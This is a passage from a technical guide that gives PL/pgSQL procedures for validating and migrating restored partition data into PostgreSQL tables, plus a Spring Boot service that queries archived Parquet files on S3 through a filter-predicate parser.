        ) INTO v_existing_count USING p_partition_value;

        IF v_existing_count > 0 THEN
            RETURN QUERY SELECT 
                'existing_partition_data'::TEXT,
                'WARNING'::TEXT,
                jsonb_build_object(
                    'count', v_existing_count,
                    'message', 'Target partition already contains data'
                );
        ELSE
            RETURN QUERY SELECT 
                'existing_partition_data'::TEXT,
                'OK'::TEXT,
                jsonb_build_object('count', 0);
        END IF;
    EXCEPTION WHEN undefined_column THEN
        RETURN QUERY SELECT 
            'partition_column_check'::TEXT,
            'ERROR'::TEXT,
            jsonb_build_object(
                'message', format('Partition column %s not found', p_partition_column)
            );
    END;

    -- Validate schemas match
    SELECT bool_and(is_valid) INTO v_schema_valid
    FROM validate_table_schemas(
        p_staging_schema, p_staging_table,
        p_target_schema, p_target_table
    );

    RETURN QUERY SELECT 
        'schema_validation'::TEXT,
        CASE WHEN v_schema_valid THEN 'OK' ELSE 'ERROR' END::TEXT,
        jsonb_build_object('schemas_match', v_schema_valid);

    -- Check for null values in NOT NULL columns by scanning the staging data
    FOR r IN
        SELECT c.column_name
        FROM information_schema.columns c
        WHERE c.table_schema = p_target_schema
          AND c.table_name = p_target_table
          AND c.is_nullable = 'NO'
    LOOP
        EXECUTE format(
            'SELECT COUNT(*) FROM %I.%I WHERE %I IS NULL',
            p_staging_schema, p_staging_table, r.column_name
        ) INTO v_null_count;

        RETURN QUERY SELECT
            ('null_check_' || r.column_name)::TEXT,
            CASE WHEN v_null_count > 0 THEN 'ERROR' ELSE 'OK' END::TEXT,
            jsonb_build_object('null_count', v_null_count);
    END LOOP;
END;
$$ LANGUAGE plpgsql;

-- Usage
SELECT * FROM generate_migration_report(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_date', '2024-01'
);

5.3 Partition Migration

-- Migrate data from staging table to main table

CREATE OR REPLACE PROCEDURE migrate_partition_data(
    p_staging_schema TEXT,
    p_staging_table TEXT,
    p_target_schema TEXT,
    p_target_table TEXT,
    p_partition_column TEXT,
    p_partition_value TEXT,
    p_delete_existing BOOLEAN DEFAULT FALSE,
    p_batch_size INTEGER DEFAULT 50000
)
LANGUAGE plpgsql
AS $$
DECLARE
    v_columns TEXT;
    v_total_migrated BIGINT := 0;
    v_batch_migrated BIGINT;
    v_validation_passed BOOLEAN;
BEGIN
    -- Validate schemas match
    SELECT bool_and(is_valid) INTO v_validation_passed
    FROM validate_table_schemas(
        p_staging_schema, p_staging_table,
        p_target_schema, p_target_table
    );

    IF NOT v_validation_passed THEN
        RAISE EXCEPTION 'Schema validation failed. Run validate_table_schemas() for details.';
    END IF;

    -- Build column list
    SELECT string_agg(quote_ident(column_name), ', ' ORDER BY ordinal_position)
    INTO v_columns
    FROM information_schema.columns
    WHERE table_schema = p_staging_schema
      AND table_name = p_staging_table;

    -- Delete existing data if requested
    IF p_delete_existing THEN
        EXECUTE format(
            'DELETE FROM %I.%I WHERE %I = $1',
            p_target_schema, p_target_table, p_partition_column
        ) USING p_partition_value;

        RAISE NOTICE 'Deleted existing data for partition % = %', 
            p_partition_column, p_partition_value;
    END IF;

    -- Migrate in batches, draining the staging table as rows are moved.
    -- The DELETE ... RETURNING feeding the INSERT guarantees termination:
    -- each pass consumes up to p_batch_size staging rows.
    LOOP
        EXECUTE format($sql$
            WITH to_migrate AS (
                SELECT ctid
                FROM %I.%I
                LIMIT $1
            ),
            moved AS (
                DELETE FROM %I.%I s
                WHERE s.ctid IN (SELECT ctid FROM to_migrate)
                RETURNING s.*
            ),
            inserted AS (
                INSERT INTO %I.%I (%s)
                SELECT %s
                FROM moved
                RETURNING 1
            )
            SELECT COUNT(*) FROM inserted
        $sql$,
            p_staging_schema, p_staging_table,
            p_staging_schema, p_staging_table,
            p_target_schema, p_target_table, v_columns,
            v_columns
        ) INTO v_batch_migrated USING p_batch_size;

        v_total_migrated := v_total_migrated + v_batch_migrated;

        IF v_batch_migrated = 0 THEN
            EXIT;
        END IF;

        RAISE NOTICE 'Migrated batch: % records (total: %)', v_batch_migrated, v_total_migrated;
        COMMIT;
    END LOOP;

    RAISE NOTICE 'Migration complete. Total records migrated: %', v_total_migrated;
END;
$$;

-- Usage
CALL migrate_partition_data(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_date', '2024-01',
    TRUE,   -- delete existing
    50000   -- batch size
);

5.4 Attach Partition (for Partitioned Tables)

-- For natively partitioned tables, attach the staging table as a partition

CREATE OR REPLACE PROCEDURE attach_restored_partition(
    p_staging_schema TEXT,
    p_staging_table TEXT,
    p_target_schema TEXT,
    p_target_table TEXT,
    p_partition_column TEXT,
    p_partition_start TEXT,
    p_partition_end TEXT
)
LANGUAGE plpgsql
AS $$
DECLARE
    v_partition_name TEXT;
    v_constraint_name TEXT;
BEGIN
    -- Validate schemas match
    IF NOT (
        SELECT bool_and(is_valid)
        FROM validate_table_schemas(
            p_staging_schema, p_staging_table,
            p_target_schema, p_target_table
        )
    ) THEN
        RAISE EXCEPTION 'Schema validation failed';
    END IF;

    -- Add a constraint matching the partition bounds. NOT VALID makes the
    -- ADD CONSTRAINT itself instantaneous; the separate VALIDATE below scans
    -- the table while holding only a SHARE UPDATE EXCLUSIVE lock. With a
    -- validated constraint in place, ATTACH PARTITION can skip its own scan.
    v_constraint_name := p_staging_table || '_partition_check';

    EXECUTE format($sql$
        ALTER TABLE %I.%I 
        ADD CONSTRAINT %I 
        CHECK (%I >= %L AND %I < %L)
        NOT VALID
    $sql$,
        p_staging_schema, p_staging_table,
        v_constraint_name,
        p_partition_column, p_partition_start,
        p_partition_column, p_partition_end
    );

    -- Validate the constraint without blocking reads and writes
    EXECUTE format($sql$
        ALTER TABLE %I.%I 
        VALIDATE CONSTRAINT %I
    $sql$,
        p_staging_schema, p_staging_table,
        v_constraint_name
    );

    -- Detach old partition if exists
    v_partition_name := p_target_table || '_' || replace(p_partition_start, '-', '_');

    BEGIN
        EXECUTE format($sql$
            ALTER TABLE %I.%I 
            DETACH PARTITION %I.%I
        $sql$,
            p_target_schema, p_target_table,
            p_target_schema, v_partition_name
        );
        RAISE NOTICE 'Detached existing partition %', v_partition_name;
    EXCEPTION WHEN undefined_table THEN
        RAISE NOTICE 'No existing partition to detach';
    END;

    -- Rename staging table to partition name
    EXECUTE format($sql$
        ALTER TABLE %I.%I RENAME TO %I
    $sql$,
        p_staging_schema, p_staging_table,
        v_partition_name
    );

    -- Attach as partition
    EXECUTE format($sql$
        ALTER TABLE %I.%I 
        ATTACH PARTITION %I.%I 
        FOR VALUES FROM (%L) TO (%L)
    $sql$,
        p_target_schema, p_target_table,
        p_staging_schema, v_partition_name,
        p_partition_start, p_partition_end
    );

    RAISE NOTICE 'Successfully attached partition % to %', 
        v_partition_name, p_target_table;
END;
$$;

-- Usage for range partitioned table
CALL attach_restored_partition(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_date',
    '2024-01-01', '2024-02-01'
);

5.5 Cleanup Script

-- Clean up after successful migration

CREATE OR REPLACE PROCEDURE cleanup_after_migration(
    p_staging_schema TEXT,
    p_staging_table TEXT,
    p_verify_target_schema TEXT DEFAULT NULL,
    p_verify_target_table TEXT DEFAULT NULL,
    p_verify_count BOOLEAN DEFAULT TRUE
)
LANGUAGE plpgsql
AS $$
DECLARE
    v_staging_count BIGINT;
    v_target_count BIGINT;
BEGIN
    IF p_verify_count AND p_verify_target_schema IS NOT NULL THEN
        EXECUTE format(
            'SELECT COUNT(*) FROM %I.%I',
            p_staging_schema, p_staging_table
        ) INTO v_staging_count;

        EXECUTE format(
            'SELECT COUNT(*) FROM %I.%I',
            p_verify_target_schema, p_verify_target_table
        ) INTO v_target_count;

        IF v_target_count < v_staging_count THEN
            RAISE WARNING 'Target count (%) is less than staging count (%). Migration may be incomplete.',
                v_target_count, v_staging_count;
            RETURN;
        END IF;
    END IF;

    EXECUTE format(
        'DROP TABLE IF EXISTS %I.%I',
        p_staging_schema, p_staging_table
    );

    RAISE NOTICE 'Dropped staging table %.%', p_staging_schema, p_staging_table;
END;
$$;

-- Usage
CALL cleanup_after_migration(
    'public', 'transactions_staging',
    'public', 'transactions',
    TRUE
);
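
The building blocks in this section compose into a single workflow. A Python orchestration sketch using the function and procedure names defined above (error handling elided; autocommit is required because migrate_partition_data commits internally):

# migrate_workflow.py

import psycopg2

from config import DatabaseConfig

conn = psycopg2.connect(DatabaseConfig.from_environment().connection_string)
conn.autocommit = True  # CALL with in-procedure COMMIT needs autocommit

with conn.cursor() as cur:
    cur.execute(
        "SELECT check_name, result FROM generate_migration_report(%s, %s, %s, %s, %s, %s)",
        ("public", "transactions_staging", "public", "transactions",
         "transaction_date", "2024-01")
    )
    report = cur.fetchall()

errors = [name for name, result in report if result == "ERROR"]
if errors:
    raise SystemExit(f"validation failed: {errors}")

with conn.cursor() as cur:
    cur.execute(
        "CALL migrate_partition_data(%s, %s, %s, %s, %s, %s, %s, %s)",
        ("public", "transactions_staging", "public", "transactions",
         "transaction_date", "2024-01", True, 50000)
    )
    cur.execute(
        "CALL cleanup_after_migration(%s, %s, %s, %s)",
        ("public", "transactions_staging", "public", "transactions")
    )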

6. Spring Boot Query API

This API allows querying archived data directly from S3 without restoring to the database.

6.1 Project Structure

src/main/java/com/example/archivequery/
    ArchiveQueryApplication.java
    config/
        AwsConfig.java
        ParquetConfig.java
    controller/
        ArchiveQueryController.java
    service/
        ParquetQueryService.java
        PredicateParser.java
    model/
        QueryRequest.java
        QueryResponse.java
        ArchiveMetadata.java
    predicate/
        Predicate.java
        ComparisonPredicate.java
        LogicalPredicate.java
        PredicateEvaluator.java

6.2 Application Entry Point

// ArchiveQueryApplication.java
package com.example.archivequery;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class ArchiveQueryApplication {
    public static void main(String[] args) {
        SpringApplication.run(ArchiveQueryApplication.class, args);
    }
}

6.3 AWS Configuration

// config/AwsConfig.java
package com.example.archivequery.config;

import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import software.amazon.awssdk.auth.credentials.DefaultCredentialsProvider;
import software.amazon.awssdk.regions.Region;
import software.amazon.awssdk.services.s3.S3Client;

@Configuration
public class AwsConfig {

    @Value("${aws.region:eu-west-1}")
    private String region;

    @Bean
    public S3Client s3Client() {
        return S3Client.builder()
            .region(Region.of(region))
            .credentialsProvider(DefaultCredentialsProvider.create())
            .build();
    }
}

6.4 Parquet Configuration

// config/ParquetConfig.java
package com.example.archivequery.config;

import org.apache.hadoop.conf.Configuration;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Bean;

@org.springframework.context.annotation.Configuration
public class ParquetConfig {

    @Value("${aws.region:eu-west-1}")
    private String region;

    @Bean
    public Configuration hadoopConfiguration() {
        Configuration conf = new Configuration();
        conf.set("fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem");
        conf.set("fs.s3a.aws.credentials.provider", 
            "com.amazonaws.auth.DefaultAWSCredentialsProviderChain");
        conf.set("fs.s3a.endpoint.region", region);
        return conf;
    }
}

6.5 Model Classes

// model/QueryRequest.java
package com.example.archivequery.model;

import java.util.List;
import java.util.Map;

public record QueryRequest(
    String archivePath,
    List<String> columns,
    Map<String, Object> filters,
    String filterExpression,
    Integer limit,
    Integer offset
) {
    public QueryRequest {
        if (limit == null) limit = 1000;
        if (offset == null) offset = 0;
    }
}
// model/QueryResponse.java
package com.example.archivequery.model;

import java.util.List;
import java.util.Map;

public record QueryResponse(
    List<Map<String, Object>> data,
    long totalMatched,
    long totalScanned,
    long executionTimeMs,
    Map<String, String> schema,
    String archivePath
) {}
// model/ArchiveMetadata.java
package com.example.archivequery.model;

import java.time.Instant;
import java.util.List;
import java.util.Map;

public record ArchiveMetadata(
    String tableUuid,
    String location,
    List<ColumnDefinition> columns,
    Map<String, String> properties,
    Instant archivedAt
) {
    public record ColumnDefinition(
        int id,
        String name,
        String type,
        boolean required
    ) {}
}
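
To make the request and response shapes concrete, here is a client-side sketch in Python. The /api/archive/query path is an assumption for illustration (the real mapping lives in ArchiveQueryController); the filter-suffix convention (_gte, _lt, and so on) matches PredicateParser.fromFilters in section 6.7:

# query_archive.py -- hypothetical client; the endpoint path is illustrative

import requests

payload = {
    "archivePath": "s3://your-archive-bucket/aurora-archives/public/transactions/transaction_date=2024-01",
    "columns": ["transaction_id", "amount", "transaction_date"],
    "filters": {
        "amount_gte": 100,        # becomes amount >= 100
        "status": "SETTLED"       # bare key becomes an equality predicate
    },
    "limit": 50,
    "offset": 0
}

response = requests.post("http://localhost:8080/api/archive/query", json=payload)
response.raise_for_status()

body = response.json()
print(f"matched {body['totalMatched']} of {body['totalScanned']} scanned rows")
for row in body["data"][:5]:
    print(row)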

6.6 Predicate Classes

// predicate/Predicate.java
package com.example.archivequery.predicate;

import java.util.Map;

public sealed interface Predicate 
    permits ComparisonPredicate, LogicalPredicate {

    boolean evaluate(Map<String, Object> record);
}
// predicate/ComparisonPredicate.java
package com.example.archivequery.predicate;

import java.math.BigDecimal;
import java.time.LocalDate;
import java.time.LocalDateTime;
import java.util.Map;
import java.util.Objects;

public record ComparisonPredicate(
    String column,
    Operator operator,
    Object value
) implements Predicate {

    public enum Operator {
        EQ, NE, GT, GE, LT, LE, LIKE, IN, IS_NULL, IS_NOT_NULL
    }

    @Override
    public boolean evaluate(Map<String, Object> record) {
        Object recordValue = record.get(column);

        return switch (operator) {
            case IS_NULL -> recordValue == null;
            case IS_NOT_NULL -> recordValue != null;
            case EQ -> Objects.equals(recordValue, convertValue(recordValue));
            case NE -> !Objects.equals(recordValue, convertValue(recordValue));
            // SQL-style semantics: ordering comparisons against NULL are false
            case GT -> recordValue != null && compare(recordValue, convertValue(recordValue)) > 0;
            case GE -> recordValue != null && compare(recordValue, convertValue(recordValue)) >= 0;
            case LT -> recordValue != null && compare(recordValue, convertValue(recordValue)) < 0;
            case LE -> recordValue != null && compare(recordValue, convertValue(recordValue)) <= 0;
            case LIKE -> matchesLike(recordValue);
            case IN -> matchesIn(recordValue);
        };
    }

    // Coerces the predicate's literal value to the runtime type of the
    // record value so the comparisons above are type-consistent.
    private Object convertValue(Object recordValue) {
        if (recordValue == null || value == null) return value;

        if (recordValue instanceof LocalDate && value instanceof String s) {
            return LocalDate.parse(s);
        }
        if (recordValue instanceof LocalDateTime && value instanceof String s) {
            return LocalDateTime.parse(s);
        }
        if (recordValue instanceof BigDecimal && value instanceof Number n) {
            return new BigDecimal(n.toString());
        }
        if (recordValue instanceof Long && value instanceof Number n) {
            return n.longValue();
        }
        if (recordValue instanceof Integer && value instanceof Number n) {
            return n.intValue();
        }
        if (recordValue instanceof Double && value instanceof Number n) {
            return n.doubleValue();
        }

        return value;
    }

    @SuppressWarnings({"unchecked", "rawtypes"})
    private int compare(Object a, Object b) {
        if (a == null || b == null) return 0;
        if (a instanceof Comparable ca && b instanceof Comparable cb) {
            return ca.compareTo(cb);
        }
        return 0;
    }

    private boolean matchesLike(Object recordValue) {
        if (recordValue == null || value == null) return false;
        String pattern = value.toString()
            .replace("%", ".*")
            .replace("_", ".");
        return recordValue.toString().matches(pattern);
    }

    private boolean matchesIn(Object recordValue) {
        if (recordValue == null || value == null) return false;
        if (value instanceof Iterable<?> iterable) {
            for (Object item : iterable) {
                if (Objects.equals(recordValue, item)) return true;
            }
        }
        return false;
    }
}
// predicate/LogicalPredicate.java
package com.example.archivequery.predicate;

import java.util.List;
import java.util.Map;

public record LogicalPredicate(
    Operator operator,
    List<Predicate> predicates
) implements Predicate {

    public enum Operator {
        AND, OR, NOT
    }

    @Override
    public boolean evaluate(Map<String, Object> record) {
        return switch (operator) {
            case AND -> predicates.stream().allMatch(p -> p.evaluate(record));
            case OR -> predicates.stream().anyMatch(p -> p.evaluate(record));
            case NOT -> !predicates.getFirst().evaluate(record);
        };
    }
}
// predicate/PredicateEvaluator.java
package com.example.archivequery.predicate;

import java.util.Map;

public class PredicateEvaluator {

    private final Predicate predicate;

    public PredicateEvaluator(Predicate predicate) {
        this.predicate = predicate;
    }

    public boolean matches(Map<String, Object> record) {
        if (predicate == null) return true;
        return predicate.evaluate(record);
    }
}

6.7 Predicate Parser

// service/PredicateParser.java
package com.example.archivequery.service;

import com.example.archivequery.predicate.*;
import org.springframework.stereotype.Service;

import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@Service
public class PredicateParser {

    private static final Pattern COMPARISON_PATTERN = Pattern.compile(
        "(\\w+)\\s*(=|!=|<>|>=|<=|>|<|LIKE|IN|IS NULL|IS NOT NULL)\\s*(.*)?",
        Pattern.CASE_INSENSITIVE
    );

    public Predicate parse(String expression) {
        if (expression == null || expression.isBlank()) {
            return null;
        }
        return parseExpression(expression.trim());
    }

    public Predicate fromFilters(Map<String, Object> filters) {
        if (filters == null || filters.isEmpty()) {
            return null;
        }

        List<Predicate> predicates = new ArrayList<>();

        for (Map.Entry<String, Object> entry : filters.entrySet()) {
            String key = entry.getKey();
            Object value = entry.getValue();

            if (key.endsWith("_gt")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 3),
                    ComparisonPredicate.Operator.GT,
                    value
                ));
            } else if (key.endsWith("_gte")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 4),
                    ComparisonPredicate.Operator.GE,
                    value
                ));
            } else if (key.endsWith("_lt")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 3),
                    ComparisonPredicate.Operator.LT,
                    value
                ));
            } else if (key.endsWith("_lte")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 4),
                    ComparisonPredicate.Operator.LE,
                    value
                ));
            } else if (key.endsWith("_ne")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 3),
                    ComparisonPredicate.Operator.NE,
                    value
                ));
            } else if (key.endsWith("_like")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 5),
                    ComparisonPredicate.Operator.LIKE,
                    value
                ));
            } else if (key.endsWith("_in") && value instanceof List<?> list) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 3),
                    ComparisonPredicate.Operator.IN,
                    list
                ));
            } else {
                predicates.add(new ComparisonPredicate(
                    key,
                    ComparisonPredicate.Operator.EQ,
                    value
                ));
            }
        }

        if (predicates.size() == 1) {
            return predicates.getFirst();
        }

        return new LogicalPredicate(LogicalPredicate.Operator.AND, predicates);
    }

    private Predicate parseExpression(String expression) {
        String upper = expression.toUpperCase();

        int andIndex = findLogicalOperator(upper, " AND ");
        if (andIndex > 0) {
            String left = expression.substring(0, andIndex);
            String right = expression.substring(andIndex + 5);
            return new LogicalPredicate(
                LogicalPredicate.Operator.AND,
                List.of(parseExpression(left), parseExpression(right))
            );
        }

        int orIndex = findLogicalOperator(upper, " OR ");
        if (orIndex > 0) {
            String left = expression.substring(0, orIndex);
            String right = expression.substring(orIndex + 4);
            return new LogicalPredicate(
                LogicalPredicate.Operator.OR,
                List.of(parseExpression(left), parseExpression(right))
            );
        }

        if (upper.startsWith("NOT ")) {
            return new LogicalPredicate(
                LogicalPredicate.Operator.NOT,
                List.of(parseExpression(expression.substring(4)))
            );
        }

        if (expression.startsWith("(") && expression.endsWith(")")) {
            return parseExpression(expression.substring(1, expression.length() - 1));
        }

        return parseComparison(expression);
    }

    private int findLogicalOperator(String expression, String operator) {
        int depth = 0;
        int index = 0;

        while (index < expression.length()) {
            char c = expression.charAt(index);
            if (c == '(') depth++;
            else if (c == ')') depth--;
            else if (depth == 0 && expression.substring(index).startsWith(operator)) {
                return index;
            }
            index++;
        }
        return -1;
    }

    private Predicate parseComparison(String expression) {
        Matcher matcher = COMPARISON_PATTERN.matcher(expression.trim());

        if (!matcher.matches()) {
            throw new IllegalArgumentException("Invalid expression: " + expression);
        }

        String column = matcher.group(1);
        String operatorStr = matcher.group(2).toUpperCase();
        String valueStr = matcher.group(3);

        ComparisonPredicate.Operator operator = switch (operatorStr) {
            case "=" -> ComparisonPredicate.Operator.EQ;
            case "!=", "<>" -> ComparisonPredicate.Operator.NE;
            case ">" -> ComparisonPredicate.Operator.GT;
            case ">=" -> ComparisonPredicate.Operator.GE;
            case "<" -> ComparisonPredicate.Operator.LT;
            case "<=" -> ComparisonPredicate.Operator.LE;
            case "LIKE" -> ComparisonPredicate.Operator.LIKE;
            case "IN" -> ComparisonPredicate.Operator.IN;
            case "IS NULL" -> ComparisonPredicate.Operator.IS_NULL;
            case "IS NOT NULL" -> ComparisonPredicate.Operator.IS_NOT_NULL;
            default -> throw new IllegalArgumentException("Unknown operator: " + operatorStr);
        };

        Object value = parseValue(valueStr, operator);

        return new ComparisonPredicate(column, operator, value);
    }

    private Object parseValue(String valueStr, ComparisonPredicate.Operator operator) {
        if (operator == ComparisonPredicate.Operator.IS_NULL || 
            operator == ComparisonPredicate.Operator.IS_NOT_NULL) {
            return null;
        }

        if (valueStr == null || valueStr.isBlank()) {
            return null;
        }

        valueStr = valueStr.trim();

        if (valueStr.startsWith("'") && valueStr.endsWith("'")) {
            return valueStr.substring(1, valueStr.length() - 1);
        }

        if (operator == ComparisonPredicate.Operator.IN) {
            if (valueStr.startsWith("(") && valueStr.endsWith(")")) {
                valueStr = valueStr.substring(1, valueStr.length() - 1);
            }
            return Arrays.stream(valueStr.split(","))
                .map(String::trim)
                .map(s -> s.startsWith("'") ? s.substring(1, s.length() - 1) : parseNumber(s))
                .toList();
        }

        return parseNumber(valueStr);
    }

    private Object parseNumber(String s) {
        try {
            if (s.contains(".")) {
                return Double.parseDouble(s);
            }
            return Long.parseLong(s);
        } catch (NumberFormatException e) {
            return s;
        }
    }
}
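
To make the suffix convention concrete, here is the same mapping sketched in Python (illustration only; the service implements this in Java as shown above):

# filter_suffixes.py - illustrative mirror of the fromFilters() suffix mapping
SUFFIX_OPS = {
    "_gt": ">", "_gte": ">=", "_lt": "<", "_lte": "<=",
    "_ne": "!=", "_like": "LIKE", "_in": "IN",
}

def to_expression(filters: dict) -> str:
    """Render a filters map as the equivalent filter expression string."""
    clauses = []
    for key, value in filters.items():
        for suffix, op in SUFFIX_OPS.items():
            if key.endswith(suffix):
                column = key[: -len(suffix)]
                rendered = ("(" + ", ".join(repr(v) for v in value) + ")"
                            if op == "IN" else repr(value))
                clauses.append(f"{column} {op} {rendered}")
                break
        else:
            clauses.append(f"{key} = {value!r}")  # bare keys default to equality
    return " AND ".join(clauses)

print(to_expression({"amount_gte": 1000, "status": "completed"}))
# amount >= 1000 AND status = 'completed'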

6.8 Parquet Query Service

// service/ParquetQueryService.java
package com.example.archivequery.service;

import com.example.archivequery.model.*;
import com.example.archivequery.predicate.*;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.parquet.avro.AvroParquetReader;
import org.apache.parquet.hadoop.ParquetReader;
import org.apache.parquet.hadoop.util.HadoopInputFile;
import org.apache.avro.generic.GenericRecord;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Service;
import software.amazon.awssdk.services.s3.S3Client;
import software.amazon.awssdk.services.s3.model.*;

import java.io.IOException;
import java.net.URI;
import java.time.*;
import java.util.*;
import java.util.concurrent.*;
import java.util.stream.Collectors;

@Service
public class ParquetQueryService {

    private static final Logger log = LoggerFactory.getLogger(ParquetQueryService.class);

    private final S3Client s3Client;
    private final Configuration hadoopConfig;
    private final PredicateParser predicateParser;
    private final ObjectMapper objectMapper;
    private final ExecutorService executorService;

    public ParquetQueryService(
        S3Client s3Client,
        Configuration hadoopConfig,
        PredicateParser predicateParser
    ) {
        this.s3Client = s3Client;
        this.hadoopConfig = hadoopConfig;
        this.predicateParser = predicateParser;
        this.objectMapper = new ObjectMapper();
        this.executorService = Executors.newFixedThreadPool(
            Runtime.getRuntime().availableProcessors()
        );
    }

    public QueryResponse query(QueryRequest request) {
        long startTime = System.currentTimeMillis();

        Predicate predicate = buildPredicate(request);
        PredicateEvaluator evaluator = new PredicateEvaluator(predicate);

        List<String> dataFiles = listDataFiles(request.archivePath());

        List<Map<String, Object>> allResults = Collections.synchronizedList(new ArrayList<>());
        long[] counters = new long[2];

        List<Future<?>> futures = new ArrayList<>();

        for (String dataFile : dataFiles) {
            futures.add(executorService.submit(() -> {
                try {
                    QueryFileResult result = queryFile(
                        dataFile, 
                        request.columns(), 
                        evaluator
                    );
                    synchronized (counters) {
                        counters[0] += result.matched();
                        counters[1] += result.scanned();
                    }
                    allResults.addAll(result.records());
                } catch (IOException e) {
                    log.error("Error reading file: " + dataFile, e);
                }
            }));
        }

        for (Future<?> future : futures) {
            try {
                future.get();
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();  // restore the interrupt flag
                log.error("Interrupted while waiting for query completion", e);
            } catch (ExecutionException e) {
                log.error("Error waiting for query completion", e);
            }
        }

        List<Map<String, Object>> paginatedResults = allResults.stream()
            .skip(request.offset())
            .limit(request.limit())
            .collect(Collectors.toList());

        Map<String, String> schema = extractSchema(request.archivePath());

        long executionTime = System.currentTimeMillis() - startTime;

        return new QueryResponse(
            paginatedResults,
            counters[0],
            counters[1],
            executionTime,
            schema,
            request.archivePath()
        );
    }

    public ArchiveMetadata getMetadata(String archivePath) {
        try {
            URI uri = URI.create(archivePath);
            String bucket = uri.getHost();
            String prefix = uri.getPath().substring(1);

            GetObjectRequest getRequest = GetObjectRequest.builder()
                .bucket(bucket)
                .key(prefix + "/metadata/v1.metadata.json")
                .build();

            byte[] content = s3Client.getObjectAsBytes(getRequest).asByteArray();
            Map<String, Object> metadata = objectMapper.readValue(content, Map.class);

            List<Map<String, Object>> schemas = (List<Map<String, Object>>) metadata.get("schemas");
            Map<String, Object> currentSchema = schemas.getFirst();
            List<Map<String, Object>> fields = (List<Map<String, Object>>) currentSchema.get("fields");

            List<ArchiveMetadata.ColumnDefinition> columns = fields.stream()
                .map(f -> new ArchiveMetadata.ColumnDefinition(
                    ((Number) f.get("id")).intValue(),
                    (String) f.get("name"),
                    (String) f.get("type"),
                    (Boolean) f.get("required")
                ))
                .toList();

            Map<String, String> properties = (Map<String, String>) metadata.get("properties");

            String archivedAtStr = properties.get("archive.timestamp");
            Instant archivedAt = archivedAtStr != null ? 
                Instant.parse(archivedAtStr) : Instant.now();

            return new ArchiveMetadata(
                (String) metadata.get("table_uuid"),
                (String) metadata.get("location"),
                columns,
                properties,
                archivedAt
            );
        } catch (Exception e) {
            throw new RuntimeException("Failed to read archive metadata", e);
        }
    }

    private Predicate buildPredicate(QueryRequest request) {
        Predicate filterPredicate = predicateParser.fromFilters(request.filters());
        Predicate expressionPredicate = predicateParser.parse(request.filterExpression());

        if (filterPredicate == null) return expressionPredicate;
        if (expressionPredicate == null) return filterPredicate;

        return new LogicalPredicate(
            LogicalPredicate.Operator.AND,
            List.of(filterPredicate, expressionPredicate)
        );
    }

    private List<String> listDataFiles(String archivePath) {
        URI uri = URI.create(archivePath);
        String bucket = uri.getHost();
        String prefix = uri.getPath().substring(1) + "/data/";

        ListObjectsV2Request listRequest = ListObjectsV2Request.builder()
            .bucket(bucket)
            .prefix(prefix)
            .build();

        List<String> files = new ArrayList<>();
        ListObjectsV2Response response;

        do {
            response = s3Client.listObjectsV2(listRequest);

            for (S3Object obj : response.contents()) {
                if (obj.key().endsWith(".parquet")) {
                    files.add("s3a://" + bucket + "/" + obj.key());
                }
            }

            listRequest = listRequest.toBuilder()
                .continuationToken(response.nextContinuationToken())
                .build();

        } while (response.isTruncated());

        return files;
    }

    private record QueryFileResult(
        List<Map<String, Object>> records,
        long matched,
        long scanned
    ) {}

    private QueryFileResult queryFile(
        String filePath,
        List<String> columns,
        PredicateEvaluator evaluator
    ) throws IOException {
        List<Map<String, Object>> results = new ArrayList<>();
        long matched = 0;
        long scanned = 0;

        Path path = new Path(filePath);
        HadoopInputFile inputFile = HadoopInputFile.fromPath(path, hadoopConfig);

        try (ParquetReader<GenericRecord> reader = AvroParquetReader
                .<GenericRecord>builder(inputFile)
                .withConf(hadoopConfig)
                .build()) {

            GenericRecord record;
            while ((record = reader.read()) != null) {
                scanned++;
                Map<String, Object> recordMap = recordToMap(record);

                if (evaluator.matches(recordMap)) {
                    matched++;

                    if (columns != null && !columns.isEmpty()) {
                        Map<String, Object> projected = new LinkedHashMap<>();
                        for (String col : columns) {
                            if (recordMap.containsKey(col)) {
                                projected.put(col, recordMap.get(col));
                            }
                        }
                        results.add(projected);
                    } else {
                        results.add(recordMap);
                    }
                }
            }
        }

        return new QueryFileResult(results, matched, scanned);
    }

    private Map<String, Object> recordToMap(GenericRecord record) {
        Map<String, Object> map = new LinkedHashMap<>();

        for (org.apache.avro.Schema.Field field : record.getSchema().getFields()) {
            String name = field.name();
            Object value = record.get(name);
            map.put(name, convertValue(value, field.schema()));
        }

        return map;
    }

    private Object convertValue(Object value, org.apache.avro.Schema schema) {
        if (value == null) return null;

        // Unwrap nullable unions (e.g. ["null", "long"]) to the concrete branch
        if (schema.getType() == org.apache.avro.Schema.Type.UNION) {
            for (org.apache.avro.Schema branch : schema.getTypes()) {
                if (branch.getType() != org.apache.avro.Schema.Type.NULL) {
                    schema = branch;
                    break;
                }
            }
        }

        if (value instanceof org.apache.avro.util.Utf8) {
            return value.toString();
        }

        if (value instanceof org.apache.avro.generic.GenericRecord nested) {
            return recordToMap(nested);
        }

        if (value instanceof java.nio.ByteBuffer buffer) {
            byte[] bytes = new byte[buffer.remaining()];
            buffer.duplicate().get(bytes);  // duplicate so the buffer is not consumed
            return Base64.getEncoder().encodeToString(bytes);
        }

        // Use the Avro logical type rather than guessing from the Java type,
        // so plain integer and long columns pass through untouched
        org.apache.avro.LogicalType logical = schema.getLogicalType();
        if (logical != null) {
